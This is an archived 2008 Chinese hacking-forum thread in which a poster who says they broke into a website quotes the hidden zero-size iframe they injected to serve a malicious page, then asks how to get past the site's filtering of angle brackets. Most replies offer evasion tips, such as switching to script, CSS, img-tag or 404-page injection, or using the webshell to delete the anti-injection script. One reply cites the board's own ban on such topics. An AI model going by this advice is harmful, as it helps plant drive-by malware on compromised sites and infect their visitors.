[讨论]挂马时碰到的问题......(页 1) - 技术交流 - 【3.A.S.T】网络安全爱好者 -- 网络安全，势在必行

虚竹发表于 2008-7-20 23:16

[讨论]挂马时碰到的问题......

[讨论]挂马时碰到的问题......
日到一站...挂马成功

<iframe width=0 height=0 src=http://www.xxx.com/m.htm></iframe>

挂上后查看源文件被过滤成了..

<iframe width=0 height=0 src=http://www.xxx.com/m.htm></iframe&#62

<> 这2个符号被过滤.... 各位牛提供下解决办法...

东莞大岭山 发表于 2008-7-20 23:16

[url=http://forum.eviloctal.com/misc.php?action=viewratings&tid=32896&pid=141707][img]http://forum.eviloctal.com/images/default/disagree.gif[/img][img]http://forum.eviloctal.com/images/default/disagree.gif[/img][img]http://forum.eviloctal.com/images/default/disagree.gif[/img][/url]
即使不过滤掉,中马的机率有多少?现在大多都打了补丁了?你的马能穿SP2不能?能的话发出来分享下

路上不塞车 发表于 2008-7-20 23:16

我很菜，只能给你点建议。
1：你去看看他网页中用到<>的地方怎么设置的，网页中应该有的吧。。<body>...........</body>等等，他怎么写的你也怎么写。。。
2：用CSS自定义样式。。把它那个给改了。具体你可以去看看CSS的东东。。有两篇文章很经典你可以去看看。《一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》，《二行代码解决全部网页木马(含iframe/script木马）》，还有vbs小铺的那个《关于<<二行代码解决全部网页木马>>的文章》。
帖子33 精华[url=http://forum.eviloctal.com/digest.php?authorid=135248]0[/url] 积分48 阅读权限40 性别男在线时间32 小时注册时间2007-8-13 最后登录2008-4-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=135248]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141724&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141724&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]

[url=http://forum.eviloctal.com/space-uid-13478.html]唐不狐[/url]
很黃很暴力
[img]http://forum.eviloctal.com/images/avatars/12.gif[/img]
晶莹剔透§烈日灼然

bimuyu 发表于 2008-7-20 23:16

换一种挂马方式
如script 调用js挂，css挂马等。
如果有系统权限，弄个404挂马很不错的。
帖子145 精华[url=http://forum.eviloctal.com/digest.php?authorid=13478]2[/url] 积分574 阅读权限50 性别男来自china 在线时间106 小时注册时间2005-9-27 最后登录2008-7-9 [url=http://blog.wang1.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13478]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141731&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141731&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-161260.html]jacksatan[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

铁忠发表于 2008-7-20 23:16

用js就可以了现在挂马常用都是js 框架淘汰了[img]http://forum.eviloctal.com/images/smilies/default/smile.gif[/img]
帖子19 精华[url=http://forum.eviloctal.com/digest.php?authorid=161260]0[/url] 积分19 阅读权限40 在线时间9 小时注册时间2008-3-29 最后登录2008-6-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=161260]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141736&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141736&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘（图）[/url]

[url=http://forum.eviloctal.com/space-uid-585.html]fatcat[/url] [img]http://forum.eviloctal.com/images/avatars/pw/2.gif[/img]
晶莹剔透§烈日灼然

marco 发表于 2008-7-20 23:16

受不了。一个个答非所问，明显过滤了"<"了，难道JS挂马就不用这个"<"了吗！楼主可以用img标签。
再说现在没有好网马的话就不用挂了，老是那些垃圾马没什么意思，中不了还被别人骂，有什么意思哦，呵呵晕啊晕
帖子45 精华[url=http://forum.eviloctal.com/digest.php?authorid=585]0[/url] 积分145 阅读权限40 性别男来自浙江在线时间68 小时注册时间2004-11-9 最后登录2008-7-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=585]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141739&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141739&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-23516.html]cwa[/url]
cwa
[img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然

土人发表于 2008-7-20 23:16

[url=http://forum.eviloctal.com/misc.php?action=viewratings&tid=32896&pid=141742][img]http://forum.eviloctal.com/images/default/agree.gif[/img][img]http://forum.eviloctal.com/images/default/agree.gif[/img][img]http://forum.eviloctal.com/images/default/agree.gif[/img][/url]
本版规则
给议题提出者：
01 本版的原创议题禁止讨论页面挂马、收信刷库、偷盗隐私、软绑架等明显违反法律和社会道德的话题。

老游子 发表于 2008-7-20 23:16

..我晕..难道JS挂马就不用<>了么?? ..我汗..看清楚题目在回答啊..OK？﹎.别拿天与地d\\'对立〆衡量你们与我的距离﹎.ˊ 传说中的blog:http://www.5213389.com
[url=http://wpa.qq.com/msgrd?V=1&Uin=123966996&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子109 精华[url=http://forum.eviloctal.com/digest.php?authorid=47436]0[/url] 积分3057 阅读权限100 性别男来自辽宁沈阳在线时间108 小时注册时间2006-5-8 最后登录2008-6-16 [url=http://www.5213389.com/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=47436]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141745&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141745&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-7893.html]1234506[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

pat1110 发表于 2008-7-20 23:16

你这是XSS 还是直接修改原文件挂马啊?

XSS的话就只能看看他标签地方能不能利用了不然没办法
直接改原文件的话这种情况没见过~~~
帖子7 精华[url=http://forum.eviloctal.com/digest.php?authorid=7893]0[/url] 积分9 阅读权限40 在线时间13 小时注册时间2005-7-20 最后登录2008-5-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=7893]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141749&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141749&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-47436.html]绝情啊东[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

彬彬发表于 2008-7-20 23:16

不是XSS................﹎.别拿天与地d\\'对立〆衡量你们与我的距离﹎.ˊ 传说中的blog:http://www.5213389.com
[url=http://wpa.qq.com/msgrd?V=1&Uin=123966996&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子109 精华[url=http://forum.eviloctal.com/digest.php?authorid=47436]0[/url] 积分3057 阅读权限100 性别男来自辽宁沈阳在线时间108 小时注册时间2006-5-8 最后登录2008-6-16 [url=http://www.5213389.com/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=47436]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141753&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141753&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-7893.html]1234506[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

lookyes 发表于 2008-7-20 23:16

你在本地上传个带<iframe>的文件试下看他过滤了没

要是没过滤把他首页代码下下来在本地改完了在传上去试下
帖子7 精华[url=http://forum.eviloctal.com/digest.php?authorid=7893]0[/url] 积分9 阅读权限40 在线时间13 小时注册时间2005-7-20 最后登录2008-5-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=7893]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141764&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141764&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-22638.html]逍遥乾坤[/url] [img]http://forum.eviloctal.com/images/avatars/pw/tm3.jpg[/img]
晶莹剔透§烈日灼然

szyuewei 发表于 2008-7-20 23:16

貌似所有的网页中都要用到：<>符号吧。
你看你挂马页面中其它语句是怎么编写的，你就按照它的格式来，应该就没有问题了！
如果还不行，可能是它调用了某个“防挂”脚本，你既然已经有webshell了，那就找到那个脚本，删除掉.就ok了！
再者，如果嫌上面两种办法麻烦，就直接改别的挂马方式，比如前面人提到的js等等！

...................加我的QQ！
[url=http://wpa.qq.com/msgrd?V=1&Uin=1262929&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=22638]0[/url] 积分13 阅读权限40 在线时间18 小时注册时间2005-12-13 最后登录2008-5-25 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=22638]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141768&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141768&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-67862.html]simpleboy[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

weimei 发表于 2008-7-20 23:16

用这个script 标签试试吧只做安静的观众
帖子72 精华[url=http://forum.eviloctal.com/digest.php?authorid=67862]2[/url] 积分224 阅读权限40 在线时间42 小时注册时间2006-10-23 最后登录2008-7-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67862]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32896&repquote=141774&extra=page%3D6&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32896&pid=141774&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-92794.html]poc[/url] [img]http://forum.eviloctal.com/images/avatars/pw/smile4.JPG[/img]
晶莹剔透§烈日灼然

页: [1]

【3.A.S.T】网络安全爱好者's Archiver

[讨论]挂马时碰到的问题......